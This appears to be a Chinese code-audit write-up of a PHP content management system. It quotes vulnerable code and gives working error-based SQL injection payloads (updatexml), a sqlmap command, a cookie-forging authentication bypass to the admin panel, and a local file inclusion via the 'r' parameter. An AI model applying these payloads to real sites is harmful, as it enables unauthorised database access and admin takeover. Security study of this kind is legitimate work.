目录
sql注入
1. admin/files/login.php
$user=$_POST['user'];
if ($login<>""){
$query = "SELECT * FROM manage WHERE user='$user'";
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());变量user可控并被带到sql语句中执行
有单引号,需要闭合
使用了mysql_error函数,使用报错注入
步骤:
burp抓包,发送到repeater
payload: admin' and updatexml(1,concat(0x7e,(select user())),1)--+
2. admin/files/columnlist.php
$delete=$_GET['delete'];
$delete2=$_GET['delete2'];
if ($delete<>""){
$query = "DELETE FROM nav WHERE id='$delete'";
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());
if ($delete2<>""){
$query = "DELETE FROM navclass WHERE id='$delete2'";
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());变量delete和delete2可控,并被带到sql语句中执行,字符型,使用报错注入
步骤:
把数据包保存成test.txt python sqlmap.py -r test.txt
3. admin/files/editcolumn.php
$id=$_GET['id'];
$type=$_GET['type'];
if ($type==1){
$query = "SELECT * FROM nav WHERE id='$id'";
$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());要添加变量type=1才会执行SQL语句
payload:
1'+or+updatexml(1,concat(0x7e,(select+user()),0x7e),1)+or+'
editcolumn.php里面不止这里有sql注入,其他执行sql语句的地方也有注入
4. admin/files/editlink.php
$id=$_GET['id'];
$query = "SELECT * FROM link WHERE id='$id'";
$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());
都是可控的,存在注入
5. admin/files/editsoft.php
$id=$_GET['id'];
$query = "SELECT * FROM download WHERE id='$id'";
$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());
存在注入
6. admin/files/editwz.php
7. admin/files/linklist.php
8. files/software.php
第二个sql语句存在注入,addslashes函数对于数字型过滤无效
9. files/content.php
和8同理
cookie伪造
inc/checklogin.php
变量user为空就退出,让变量user有值就能绕过鉴权了
访问http://IP:port/admin/?r=index
就能不用密码登录后台了
文件包含
index.php
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件变量action可控,并被include函数包含
在根目录放一个phpinfo
